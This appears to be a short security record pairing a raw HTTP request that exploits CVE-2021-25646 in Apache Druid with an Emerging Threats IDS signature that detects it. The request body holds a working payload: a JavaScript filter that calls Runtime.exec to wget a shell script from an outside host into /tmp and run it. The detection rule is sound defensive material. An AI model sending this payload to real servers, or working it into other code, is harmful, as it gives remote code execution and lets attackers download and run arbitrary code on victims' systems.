POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: x.x.x.x:8888
Content-Length: 612
Accept: application/json, text/plain, /
Origin: http://x.x.x.x:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json;charset=UTF-8
Referer: http://x.x.x.x:8888/unified-console.html
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript", "function":"function(value){return java.lang.Runtime.getRuntime().exec('wget http://x.x.x.x/1.txt -O /tmp/1.sh && sh /tmp/1.sh')}", "dimension":"added", "":{ "enabled":"true" } }}}},"samplerConfig":{"numRows":500,"cacheKey":"73a90acaae2b1ccc0e969709665bc62f"}}
alert http any any -> any any (msg:"ET EXPLOIT CVE-2021-25646 Apache Druid RCE POST"; flow:established,to_server; content:"POST"; http_method;content:"/druid/indexer/v1/sampler?for=filter"; http_uri; content:"java.lang.Runtime.getRuntime().exec(";http_client_body; nocase; reference:url,mp.weixin.qq.com/s/Eny6AnFarvvpjeEJNMfTrw; reference:cve,2021-25646; classtype:web-application-attack; sid:2031533; rev:2; metadata:affected_product Web_Server_Applications, created_at 2021_02_03, cve CVE_2021_25646, former_category EXPLOIT, signature_severity Major, updated_at 2021_02_03;)